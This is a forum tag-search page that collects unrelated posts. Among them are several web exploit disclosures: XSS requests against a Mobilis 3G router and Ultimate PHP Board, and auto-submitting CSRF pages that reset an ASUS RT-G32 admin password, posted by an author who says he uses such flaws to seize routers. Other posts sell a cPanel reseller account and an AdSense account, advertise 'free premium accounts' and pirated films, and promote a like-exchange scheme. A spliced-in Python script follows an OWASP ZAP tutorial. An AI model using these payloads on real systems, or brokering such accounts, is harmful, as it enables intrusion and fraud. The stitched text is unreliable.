Showing results for tags 'site'.

  1. Fox eBook - eBooks Free Download Site. Programming, mathematics, finance and economics, gastronomy, politics... an extraordinary site. ENJOY!
  2. I like this site: Free Premium Accounts | Daily Updates
  3. Mobilis 3G mobiconnect 3G++ Stored XSS vulnerability

    ###########################
    # Exploit Title: Mobilis 3g mobiconnect 3G++ Stored XSS vulnerability
    # Date: 07/01/2015
    # Author: kabanni kacily2008@gmail.com
    # Product web page: http://www.3G.dz/ http://www.mobilis.dz/
    # Version of software: WEB_MOBILISDZMF667V1.0.0B03
    # Version of the firmware: BD_HDW5MF667V1.0.0B01
    # Version of equipment: MF667-2.0.0
    # Product & Service Introduction: http://www.zte.com.cn http://www.mobilis.dz/entreprises/mobiconnect.php http://www.3g.dz/fr/cle_mas/index.php?id_document=2
    # Tested on: WifiSlax (Es)
    ###########################
    (ASCII banner: HaChkerz_Dz / Algerian HaCker / 0x00 Team, 2015; Site: GDGBordj.org; fb: @kabanni; kacily2008@gmail.com)
    Mobilis 3g mobiconnect 3G++ XSS vulnerability
    ##########################
    # Sample Payload for Stored XSS: "<script>alert(0);</script> "
    # Solution: Filter the input fields against XSS attacks.
    # code:
    GET /goform/goform_get_cmd_process?cmd=%3Cscript%3Ealert%28%27happy%20new%20year%27%29%3C/script%3E HTTP/1.1
    Host: 192.168.0.1 (or http://m.home)
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657777723a302c226c6f675f616374697665223a307d
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    # Attack details: The variable cmd has been set to the simple payload <script>alert('happy new year')</script>
    --==[[ Greetz To ]]==--
    # 0x00, Alhack, Mr.elhdj Google, Hakim_Ghorb, Mohamed Ramaden, Team Anonymous.
    # Mr.Zaki, Dr.Ben Taleb, unKnown, Dahmani, Good_person, Boud_Sah, Moh_Dz, Yass_assasine.
    # Amin-Biskra, Bouhlel, Mr.Control, Najmo & all students of TIC & Informatics at Msila_Msila
  4. Hi, I'm selling a cPanel reseller account that also contains a fairly good site: 60,000 unique visitors/day, traffic from Egypt/Saudi Arabia. The price is 200 USD in Bitcoin, or PM me. I'm not posting the site here; I only give it out by private message, to trustworthy people. I can provide proof that I have access to the site, and I can provide screenshots from AwStats to demonstrate the visitors, etc.
  5. sleed

    XSS Nokia

    Title: XSS Nokia.com PoC
    Status: Reported
    References: Cross Site Scripting: OWASP
    Author: sleed
  6. The Filme-OnlineHD site offers quality films subtitled in Romanian. The pop-up ads displayed on the site come from the players; it is not our fault. More information at http://filme-onlinehd.com/reclame/ Site: http://filme-onlinehd.com/
  7. Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32.

    -------------------------
    Affected products:
    -------------------------
    The following model is vulnerable: ASUS RT-G32 with different versions of firmware. I checked ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.

    ----------
    Details:
    ----------
    Cross-Site Scripting (WASC-08):

    http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
    http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
    http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
    http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

    These vulnerabilities work both via GET and via POST (they work even without authorization).

    ASUS RT-G32 XSS-1.html

    <html>
    <head>
    <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/start_apply.htm" method="post">
    <input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
    <input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
    <input type="hidden" name="action_script" value="'+alert(document.cookie)+'">
    <input type="hidden" name="flag" value="'+alert(document.cookie)+'">
    </form>
    </body>
    </html>

    Cross-Site Request Forgery (WASC-09):

    The CSRF vulnerability allows changing different settings, including the admin's password, as I showed in this exploit (post-auth).

    ASUS RT-G32 CSRF-1.html

    <html>
    <head>
    <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
    </head>
    <body onLoad="document.hack.submit()">
    <form name="hack" action="http://site/start_apply.htm" method="post">
    <input type="hidden" name="http_passwd" value="admin">
    <input type="hidden" name="http_passwd2" value="admin">
    <input type="hidden" name="v_password2" value="admin">
    <input type="hidden" name="action_mode" value="+Apply+">
    </form>
    </body>
    </html>

    I have been finding this and other routers since summer to take control over terrorists in the Crimea, Donetsk and Lugansk regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many of my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned these vulnerabilities on my site (http://websecurity.com.ua/7644/).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua

    Source
  8. blech

    unindexed

    I haven't seen it posted on the forum before, and it looks interesting to me:

    A website that irrevocably deletes itself once indexed by Google.

    The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site; these contributions will also be destroyed when the site deletes itself.

    https://github.com/mroth/unindexed
  9. As the title says, I need someone to build me a site like dateprofits.com. Whoever is interested and thinks they can build a site like that, I await your PM. Budget: $3000. For more details, I await your PM. Have a pleasant week.
  10. unindexed

    A website that irrevocably deletes itself once indexed by Google.

    The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site; these contributions will also be destroyed when the site deletes itself.

    Why would you do such a thing? The full explanation is in the content of the site (which is not linked anywhere here).

    UPDATE: The experiment lasted 22 days before it was indexed by Google on 24 February 2015 at 21:01:14 and instantaneously destroyed. It was primarily shared via physical means in the real world, word of mouth, etc. If you didn't find it before it went away. If you want to conduct your own similar experiment, the source code is here.

    info

    Nothing has been done to prevent the site from being indexed, however the NOARCHIVE meta tag is specified, which prevents the Googles from caching their own copy of the content.

    The content for this site is stored in memory only (via Redis) and is loaded in via a file from an encrypted partition on my personal laptop. This partition is then destroyed immediately after launching the site. Redis backups are disabled. The content is flushed from memory once the site detects that it has been indexed.

    The URL of the site can be algorithmically generated and is configured via environment variable, so this source code can be made public without disclosing the location of the site to bots.

    Visitors can leave comments on the site while it is active. These comments are similarly flushed along with the rest of the content upon index event, making them equally ephemeral.

    other

    Sample configuration notes for running on Heroku:

    $ heroku create `pwgen -AnB 6 1` # generates a random hostname
    $ heroku addons:add rediscloud # default free tier disables backups
    $ heroku config:set REDIS_URL=`heroku config:get REDISCLOUD_URL`
    $ heroku config:set SITE_URL=`heroku domains | sed -ne "2,2p;2q"`
    $ git push heroku master
    $ heroku run npm run reset
    $ heroku addons:add scheduler:standard
    $ heroku addons:open scheduler

    Schedule a task every N minutes for npm run-script query (unfortunately it seems like this can only be done via the web interface). Use scripts/load_content.js to load the content piped from STDIN. You can configure monitoring to check the /status endpoint for "OK" if you trust an external service with your URL.

    Link: https://github.com/mroth/unindexed
  11. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting

    Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability.

    # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability
    # CVE : CVE-2015-2217
    # Date : 4 March 2015
    # Exploit Author : CWH Underground
    # Discovered By : ZeQ3uL
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.myupb.com
    # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip
    # Version : 2.2.7

    (CWH Underground ASCII banner)

    ####################
    SOFTWARE DESCRIPTION
    ####################
    Ultimate PHP Board is completely text based, making it easy for anybody who has access to PHP to run a message board of their own without the need for MySQL.

    ####################################
    DESCRIPTION FOR CROSS SITE SCRIPTING
    ####################################
    myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected.

    ####################
    VULNERABILITY DETAIL
    ####################
    1. Reflected Cross Site Scripting (search.php)
    POC: /search.php?q='><script>alert(1)</script>

    2. Stored Cross Site Scripting (profile.php)
    POC:
    POST /upb/profile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/upb/profile.php
    Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------287611866431947
    Content-Length: 716

    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_email"

    t@t.com
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_loca"

    th
    -----------------------------287611866431947
    Content-Disposition: form-data; name="avatar"

    images/avatars/chic.jpg'><script>alert("hacked");</script>
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_site"

    http://
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_timezone"

    0
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_edit"

    Submit
    -----------------------------287611866431947--

    ################################################################################################################
    Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
    ################################################################################################################

    Source
  12. Hi RST, a friend told me how I too can make $5 a day; I only spend 3-4 hours at most to make that much, and if you stay on longer you can make even more. It's a site where you can give likes to Facebook pages and comments, Google +1s, YouTube views and much more. This is the site with my ref: Free Facebook Likes - Facebook Like Exchange - Like4.us, and without ref: Home - Like4.us. Yesterday I transferred out the 5 euros I had made!
  13. Google yesterday announced that it would expand its browser security efforts with a new warning in Chrome about unwanted software to caution users about accessing sites that are known to encourage unsafe downloads.

    The Mountain View, Calif., search and browsing giant has invested serious resources into its safe browsing features over the past several years. The company revamped its malware and bad SSL certificate warnings last year following a pair of studies seeking to determine how browser-based warnings could effectively stop users from clicking through to potentially dangerous content.

    To this point, a user would trigger Google's unwanted software warning in Chrome just as he attempted to download sketchy content. Now the warnings kick in as the user attempts to browse directly to a site or in Google search results leading to the site.

    "If you're a site owner, we recommend that you register your site with Google Webmaster Tools," wrote Google software engineer Lucas Ballard. "This will help you stay informed when we find something on your site that leads people to download unwanted software, and will provide you with helpful tips to resolve such issues."

    Early last year, Google ruffled some feathers by announcing it would block malicious file downloads by default in its Chrome browser. While some expressed concern about Google acting as a gatekeeper for acceptable content, the company ultimately went forward with the move. Yesterday's announcement takes Google's year-old decision one step further, allowing the company to encourage users not to visit certain sites as opposed to encouraging them not to download certain files. Later in 2014, the company expanded its definition of unwanted software to include programs that purport to be something they are not or make unwanted changes to the user's browser.

    Source
  14. How To Assess a Third Party Web Site or Cloud Service with the OWASP ZAP Attack Proxy When You Don't Have Permission to Pentest

    As a security professional, you will often be asked to give your opinion or assessment on the security of a third-party web site or cloud service. The person asking the question will usually have no authority to give you permission to run a penetration test on the remote site, and the chances that you can secure permission from the remote site's owner will also be remote. If this happens to you, are you stuck? Actually, the answer is no. There is plenty of reconnaissance you can perform on a third-party service without requesting special permission, as long as you have a solid attack proxy and a plan.

    Introducing the OWASP ZAP Attack Proxy

    One of the top free tools in application security and pentester toolboxes these days is the OWASP ZAP attack proxy. ("ZAP" stands for "Zed Attack Proxy.") In pentest mode, this tool can map a site, attempt exploits and fuzz input, but using these capabilities against a third-party site without the owner's permission can be an invitation for trouble. Fortunately, third-party site owners usually grant permission during trial and demo periods to try out their site and service using normal web browsers and mobile devices. The trick to good (and legal) reconnaissance is to only capture and analyze the traffic available in the trial period, and this happens to be another application at which OWASP ZAP excels.

    Setting Expectations and Getting Internal Permission

    Before you do anything technical, however, you should set expectations and get some cover from the person who requested the assessment. In the process of doing this, you will also lay out your plan, request access to a demo account, and explicitly tell the requester what you are not going to do (i.e., "hack" or run a "pentest"). After you do more of these evaluations you will surely develop your own template, but the following message will get you started:

    For your own protection, please do NOT begin your research until you get:
    - A positive acknowledgment to your "Is this OK?" question in writing.
    - A working demo account, which you have tested using a regular Web browser.

    Planning Your Reconnaissance

    If you don't get to hack, what can you do? Actually, the list of items you can investigate from normal traffic is often long enough to make a judgment call on the security posture of the target service. In this article we'll cover "just" nine, but you could certainly look at many more.
    1. Use of HTTPS to protect traffic
    2. Quality of SSL certificate
    3. Avoids client-side secrets or authentication
    4. Up-to-date software
    5. Secure site headers
    6. Proper location and protection of vital assets
    7. Avoids information leakage through "extra" fields
    8. Access controls on web APIs (sometimes)
    9. Evaluation of legal and privacy policy

    Preparing OWASP ZAP and Your Browser

    To use OWASP ZAP in a noninvasive, passthrough mode, you need to set ZAP up as a proxy.
    1. From ZAP's main menu, select "Tools | Options".
    2. In the "Local Proxy" section, set the address and port your browser will use (the defaults are an address of "localhost" and a port of "8080").
    3. In the "Dynamic SSL" section, click the "Generate" button to create a CA certificate to use to facilitate your HTTPS connections.
    4. Still in the "Dynamic SSL" section, click the "Save" button to save a copy of this CA certificate as a *.cer file (you will want to import this CA into your browser soon to avoid "untrusted SSL certificate" blocks).
    5. Pick the Web browser you want to use to examine the remote site. Since I use Chrome for my daily browsing, I usually use Firefox as my secondary browser for Web analysis.
    6. Open your selected Web browser and set up its proxy settings, located here in current versions of Firefox ("Options" dialog, "Network" tab, "Connection" section, "Settings" button): …IE ("Settings" icon, "Internet Options" option, "Connections" tab, "LAN Settings" button) …and Chrome ("Settings" dialog, "Show advanced settings…" link, "Network" section, "Change proxy settings…" button, then see the "IE" entry above because it uses the same "Internet Properties" dialog as IE).
    7. Once you have configured your proxy, you should also import the proxy's SSL CA certificate so your browser will not warn you about a bad certificate (the proxy's certificate) every time you contact an HTTPS server. In Firefox, the list of trusted CA certificates is available from the "Certificates" tab in the program options. In IE and Chrome, the list of trusted CA certificates is also available through each browser's options, but is actually saved in the local Windows operating system, not the browser itself.
    8. To test all this, restart your selected browser, make sure OWASP ZAP is running, and contact an HTTPS-protected site like https://www.google.com. You may immediately see a certificate warning page like this: …because the certificate presented by the proxy does not match the target, but you should have an option to "Add Exception" or "Proceed" because you already added the proxy's certificate to your list of trusted CAs (e.g., you get a yellow warning you can ignore instead of a red error that stops you from proceeding). To proceed, click the available link and inspect the provided certificate. If you performed your steps correctly you will see "OWASP" all over it. Click the "Permanently store this exception" box and then click the "Confirm Security Exception" button (or similar controls) to dismiss the error and proceed with your connections.

    Bypassing the Proxy for Certain Sites

    As you perform research on various sites, you may also want to set up a list of sites that will not be queried through the proxy. These settings are usually near your browser's other proxy settings. For example, in Firefox, they are immediately below the proxy host and port settings.

    Performing Your Reconnaissance

    Now that you have OWASP ZAP and your browser set up, let's proceed with some reconnaissance. Our sample target today will be a web services company called EventMobi, which hosts a public demo at MFG 2015. (Remember, we're being non-invasive, so public resources are best!)

    Use of HTTPS to protect traffic

    To get started, simply open up the public demo link in your browser. (Do NOT enter it into the inviting little "URL to attack" field in OWASP ZAP!) Since we're going through a proxy that may tie things up, you may need to refresh your browser (or perform the "Resolving Missing Images" procedure below) a few times to get all the content you want, but in less than a minute you should see a valid web page in your browser: …and some folders will start to appear in ZAP under the "Sites" list. Notice that pages are already listed as coming from "http" or "https." In the case of our sample site, it's clear that all content is being served from http, and that we haven't been pushed to https automatically. To research this further and see if https is an option if we want secure transport, we can go back to the browser and simply change the main URL from MFG 2015 to https://eventmobi.com/mfg2015/attendees/76204. In this case, the site doesn't load (there is an eternally spinning "loading" circle), so we switch to a "normal" browser (not going through the proxy) to confirm the lack of HTTPS support. Since the behavior is the same with our proxied and normal browsers, we reach an unfortunate conclusion: this site doesn't use HTTPS by default, and won't support HTTPS if we ask for it.

    Resolving Missing Images

    To resolve images and other resources that come from other sites, you may need to perform the following procedure, especially if they are being served from HTTPS resources.
    1. Right-click the non-resolving resource (such as an image) and click "Copy Image Location" (or similar).
    2. In a new tab, paste the URL from the previous step.
    3. Click through any certificate resolution or other site-specific errors until the specific resource resolves.
    4. Go back to the tab with the main application and refresh it to resolve all resources from the same site.

    Assessment of Sample Site: For "use of HTTPS to protect traffic," we conclude that this site is weak because it doesn't use HTTPS by default, and won't support HTTPS if we ask for it.

    Quality of SSL certificate

    While we're on the subject of HTTPS, we should step out of our proxied browser again and inspect the real X.509 certificate being offered up by our target site. We can usually do this by clicking the lock or certificate icon near our page URL. Here is what that looks like in Chrome (my daily, non-proxy browser). To get even more information, click "Certificate information." There are generally three things you want to look for here. First, make sure that there is a fully trusted path to a legitimate CA. This certificate is in good shape. Next, check the "CN" on the certificate (usually in the "Subject" field). In this case, the certificate looks like a "wildcard" certificate because the CN is for the entire domain rather than a specific server. This is often a good sign, because wildcard certificates indicate that a company is large or stable enough to spend the extra money on a site-wide certificate. Finally, take a look through the other fields on the certificate. In this case, there is an interesting list of what appears to be customer-specific sites in the "Subject Alternative Field." If you plan on using your own domain name through the provider, having this list broadcast to anyone who connects to the provider's Web site might or might not make you nervous.

    Assessment of Sample Site: For "quality of SSL certificate" we conclude that this site is OK because it uses a valid X.509 certificate, but could be better since the certificate seems to be leaking the URLs of some other customer sites.

    Avoids client-side secrets or authentication

    Now that we're done with SSL and certificates, let's look at the application itself. To see how it works, click throughout the application in your proxied browser. (In other words, try to go everywhere you can through links, buttons and forms.) Once you have a nice set of data, return to the ZAP console and open the tree that corresponds to our target site (in this case, "http://eventmobi.com"). Then drill down into a particular request and click the "Response" tab to see what the target site is telling us. What we are mostly looking for here is JavaScript or other client code that is performing authentication requests, especially passwords accidentally sent to the client. (To help detangle hard-to-read JavaScript, remember to use a JavaScript Beautifier.) Our target site has a lot of its resources in a "webapp/view/high/js" tree, so we can drill down there to look at individual files. Another place to look for potential exposure is the history of requests at the bottom of the ZAP console. In this case, ZAP has highlighted a "*.js" file that contains the word "password" and warrants further inspection. A complete analysis of client code, authentication routines and unsafe password handling is beyond this article (and could take more time than the rest of the steps combined), but suffice it to say that our target site passed its inspection.

    Assessment of Sample Site: For "avoids client-side secrets or authentication" we conclude that this site is fine because it doesn't do client-side authentication and keeps its passwords safe on the server.

    Up-to-date software

    Most Web sites depend on a variety of third-party libraries and applications, and many sites lag behind the most current and secure versions of these components. This problem is so widespread that OWASP continues to track it as #9 in its Top Ten Web Vulnerabilities. Fortunately ZAP can help us look for these in three ways.

    First, we can look at Web site headers for Web software version numbers. Unless it's suppressed by the target server or an intervening firewall, this information will be displayed in any content response from the site. In this case we see that the site is claiming to run version 1.1.19 of the nginx Web server. Checking the nginx release history, we see that that version was released in April 2012 - almost three years ago. We can also look up nginx security vulnerabilities to see that our target server may have a number of "medium" severity vulnerabilities (fortunately no "major" vulnerabilities), including:
    - SSL session reuse vulnerability
    - Request line parsing vulnerability
    - Memory disclosure with specially crafted HTTP backend responses
    - Vulnerabilities with Windows directory aliases

    Second, we can use ZAP to look for application environment versions. These may be displayed if we access "Web application" files like *.php, *.aspx, etc. (Hiding this information is a best practice, so it may not appear on all sites.) In this case we see that the remote site is running PHP version 5.3.10, and is also probably running Ubuntu with a Linux kernel version of 3.15. That suggests that the operating system was updated at least once in the past year (OK), but that the PHP environment has been deprecated (all support, including security support, terminated in mid-2014).

    Finally, we can also use ZAP to check standardized JavaScript libraries and other includes for vulnerable versions. These may be easy to find in the list of downloaded assets: …or may be buried in inline page includes (which requires looking through downloaded content). In this case, we can check at least three standard libraries for known vulnerabilities:
    - socket.io (version 0.9.11) - current version is 1.3.3; this version appears safe
    - jquery (version 1.7) - current version is 1.9; this version appears safe
    - keen (version 2.1.0) - current version is 3.2.2; this version appears safe
    - etc…

    Assessment of Sample Site: For "up-to-date software" we conclude that this site is worrisome because it is running a pretty old version of its Web server software with several known vulnerabilities and an out-of-support version of PHP. (The application JavaScript components appear fine, but the Web server and PHP issues are enough to cause concern.)

    Secure site headers

    A sign that a service takes security seriously is the use of special Web site headers designed to prevent XSS and related exploits. Many of these headers are detailed on other sites, but some of the best ones to look for are:
    - X-Frame-Options: SAMEORIGIN or X-Frame-Options: DENY
    - X-Content-Type-Options: nosniff
    - (Missing) X-Powered-By…
    - Strict-Transport-Security
    - Content-Security-Policy

    Using ZAP, these would show up in the Response section of most file requests. Unfortunately, none of the secure headers we would like to see are used by our target site, and as we saw above, the target site quite happily uses an "X-Powered-By" header to tell us about the underlying application (PHP) and OS (Ubuntu Linux) environment.

    Assessment of Sample Site: Our target site does not use any "secure site headers," and does not suppress headers that may provide helpful information to hackers.

    Proper location and protection of vital assets

    One of the many things ZAP does well is organize detected assets by site of origin. This makes it easy to see where a target site stores its assets and runs its application. In the case of our target site we can see resources come from newrelic.com, linkedin.com, amazonaws.com and google-analytics.com, among other places. For now we will ignore the tracking and advertising sites and zero in on resources pulled from Amazon's S3 storage service. To see these, open up the related tree until you can drill down to an asset. Notice that the full URL of each asset is available in ZAP. To see whether or not an asset is accessible without any access control, copy its URL into an "incognito" browser window in a non-proxy browser. (ZAP provides a right-click "Copy URLs to Clipboard" option for this exact purpose.) If you can pull up the resource in a fresh, incognito browser session, there is generally no access protection and anyone with the URL to the resource can access it. In some cases this is OK, but if confidential information is ever accessible in this way you could have a leak on your hands.

    Assessment of Sample Site: In terms of "proper location and protection of vital assets" there are a number of company-specific assets that are stored on publicly-accessible storage at Amazon. Since all the information we plan to store in this application is public anyway, this is OK, but we would need to see a different storage mechanism in place with enforced access controls if we planned to use the service with any confidential information.

    Avoids information leakage through "extra" fields

    It is common for Web applications, particularly Web services, to provide "extra" information with requests that client-side (usually JavaScript) code will filter out. However, all this information is easily accessible to interested parties, including you. To look for this type of information using ZAP, look for large page or Web service requests in your history, then dig into the fields provided. Remember to cut/paste data into JSON prettifiers and other tools if you need help visualizing it. For example, here is an abbreviated response from our sample site:

    {
      "response": {
        "id": "76204",
        "name": "Attendees",
        "items": [
          {
            "id": "1812359",
            "first_name": "James Avery",
            "about": "",
            "image50": "50mfg-m-01.jpg",
            "image100": "100mfg-m-01.jpg",
            "title": "Support Specialist",
            "company_name": "Metropolitan Financial Group",
            "website": "http://www.eventmobi.com",
            "facebook": "http://www.facebook.com/eventmobi.com",
            "twitter": "http://twitter.com/eventmobi",
            "linkedin": "http://www.linkedin.com/in/eventmobi",
            "url": "http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812359"
          },
          {
            "id": "1812360",
            "first_name": "Joe Baker",
            "about": "",
            "image50": "50crop_547c946dd931f_128_(1).jpg",
            "image100": "100crop_547c946dd931f_128_(1).jpg",
            "title": "CEO",
            "company_name": "Metropolitan Financial Group",
            "website": "http://www.eventmobi.com",
            "facebook": "http://www.facebook.com/eventmobi.com",
            "twitter": "http://twitter.com/eventmobi",
            "linkedin": "http://www.linkedin.com/in/eventmobi",
            "url": "http://api.eventmobi.com/en/api/v1/events/MFG2015/sections/76204/items/1812360"
          },

    This is a block of JSON that shows that the target site will happily dump a complete attendee list, including self-provided contact information.

    Assessment of Sample Site: In terms of "avoids information leakage through 'extra' fields" the target site is OK. Although interesting fields such as "linkedin" are revealed, they must be added by individual users and are probably easy to find through other publicly available sources.

    Access controls on web APIs

    After you have identified a few key API service calls in ZAP, copy the URLs out and try them in your incognito Web browser to see if they are protected by any access controls. In the case of our sample site, there do not appear to be any access controls on the API.

    Assessment of Sample Site: In terms of "access controls on Web APIs" there do not appear to be any access controls. This may be OK for public information, but if information such as lists of attendees is sensitive, then we may be concerned.

    Evaluation of legal and privacy policy

    Finally, you can put ZAP down for a minute and read some legalese. Go back to the target site using a non-proxy Web browser and find its legal terms, privacy or security policy. For our target site, a privacy policy can be found at http://www.eventmobi.com/legal/privacy-policy/ At a high level, you are looking for promises of privacy or security made in the legal policy that do not seem to be backed up with technical controls. As it turns out, our target's privacy policy is weak, but accurately describes what they do or do not do. In a section about the type of information collected and its use, our target accurately lists what they collect and states that the information of participants is "publicly available online" (as we saw while looking at Web service access controls). In the "Security" section we see a statement about "suitable procedures" to protect information collected online. This is vague enough to encompass what we saw in our investigation (e.g., no encryption for public information), but without more inspection we have to take our target at its word. Finally, another "Security" section contains a vague promise of "security measures," and then honestly puts the onus of not posting anything confidential on the users.

    Assessment of Sample Site: Our "evaluation of legal and privacy policy" did not give us great confidence in the security of the site, but it agrees with our overall technical assessment. For that reason, it strikes us as an honest policy.

    Filing Your Report

    Now that you have completed your analysis, it's time to provide a recommendation based on your limited information.
Remember that your requester is primarily looking for a simple answer to this question: “Is this service safe enough for the job?” A typical results report might resemble the following template. For example, an evaluation of our sample target might yield the following report. Source
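The "secure site headers" and "extra fields" checks that the post above performs by hand in ZAP can be scripted once a response has been captured. The following is an added example, not code from the original post or from ZAP: it takes a response's headers as a plain dict and a decoded JSON body, reports which of the listed secure headers are missing or weakly set, which stack-revealing headers are still present, and which contact-style fields a web-service response exposes. The sample headers and the JSON body are constructed, and the acceptance rules for header values (for example requiring a positive max-age on Strict-Transport-Security) are my own assumptions, not something the post states.

```python
"""Script the 'secure site headers' and 'extra fields' checks from the post.

Added example (not from the original post or from ZAP). It works on captured
data, a dict of response headers and a decoded JSON body, so it runs offline.
"""
import json


def _hsts_ok(value):
    """Accept Strict-Transport-Security only with a positive max-age (assumption)."""
    for part in value.split(";"):
        name, _, number = part.strip().partition("=")
        if name.strip().lower() == "max-age" and number.strip().isdigit():
            return int(number) > 0
    return False


# Secure headers the post tells us to look for, with the values we accept.
# The header names come from the post; the acceptance rules are assumptions.
REQUIRED_HEADERS = {
    "x-frame-options": lambda v: v.strip().upper() in ("SAMEORIGIN", "DENY"),
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "strict-transport-security": _hsts_ok,
    "content-security-policy": lambda v: bool(v.strip()),
}

# Headers that describe the stack and should be suppressed (the post flags X-Powered-By).
LEAKY_HEADERS = ("x-powered-by", "server", "x-aspnet-version")

# Field names that typically carry contact or profile data an API may over-share.
CONTACT_KEYS = {"email", "phone", "facebook", "twitter", "linkedin", "website", "address"}


def assess_headers(headers):
    """Return {'missing': [...], 'weak': [...], 'leaky': {name: value}}.

    `headers` maps header name -> value; names are compared case-insensitively.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    missing = [h for h in REQUIRED_HEADERS if h not in lower]
    weak = [h for h, ok in REQUIRED_HEADERS.items() if h in lower and not ok(lower[h])]
    leaky = {h: lower[h] for h in LEAKY_HEADERS if h in lower}
    return {"missing": missing, "weak": weak, "leaky": leaky}


def inventory_fields(obj, prefix=""):
    """Flatten decoded JSON into dotted key paths such as 'response.items[].linkedin',
    so every field the service returns is visible, not only what the client renders."""
    paths = set()
    if isinstance(obj, dict):
        for key, value in obj.items():
            paths |= inventory_fields(value, f"{prefix}.{key}" if prefix else key)
    elif isinstance(obj, list):
        for value in obj:
            paths |= inventory_fields(value, prefix + "[]")
    else:
        paths.add(prefix)
    return paths


def contact_fields(obj):
    """Sorted field paths whose last segment looks like contact or profile data."""
    return sorted(p for p in inventory_fields(obj) if p.rsplit(".", 1)[-1] in CONTACT_KEYS)


# Constructed sample headers: a site with no secure headers and chatty stack headers.
SAMPLE_WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Server": "Apache (constructed)",
    "X-Powered-By": "PHP/5.x (constructed)",
}

# Constructed sample headers: the same site after hardening.
SAMPLE_HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
}

# Constructed JSON body shaped like the abbreviated attendee response in the post.
SAMPLE_BODY = json.loads("""
{"response": {"id": "0", "name": "Attendees", "items": [
  {"id": "1", "first_name": "Example Person", "title": "Analyst",
   "company_name": "Example Co", "website": "http://example.invalid",
   "twitter": "http://twitter.invalid/example",
   "linkedin": "http://linkedin.invalid/in/example"}
]}}
""")

if __name__ == "__main__":
    print("weak site:    ", assess_headers(SAMPLE_WEAK_HEADERS))
    print("hardened site:", assess_headers(SAMPLE_HARDENED_HEADERS))
    print("contact fields:", contact_fields(SAMPLE_BODY))
```

To use it on a real capture, paste the Response headers ZAP shows for a request into a dict and the body into json.loads(); a header listed under "missing" or "weak", or any entry under "leaky", is a finding in the sense the post describes.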
  15. Hi guys. I apologize if I didn't post in the right place. I had several sites on which I used an AdSense account. It is about four years old, and the last payment from Google was last year, in April. I have now given up the sites and at the moment there are about 35 euros in the account. Those interested, please send me an offer by PM. Thanks.
  16. # Exploit Title: Wordpress Media Cleaner - XSS
# Author: İsmail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6
# Vulnerable File(s):
[+] wp-media-cleaner.php
# Vulnerable Code(s):
[+] 647. Line $view = $_GET['view'] : "issues";
[+] 648. Line $paged = $_GET['paged'] : 1;
[+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;
# Request Method(s):
[+] GET
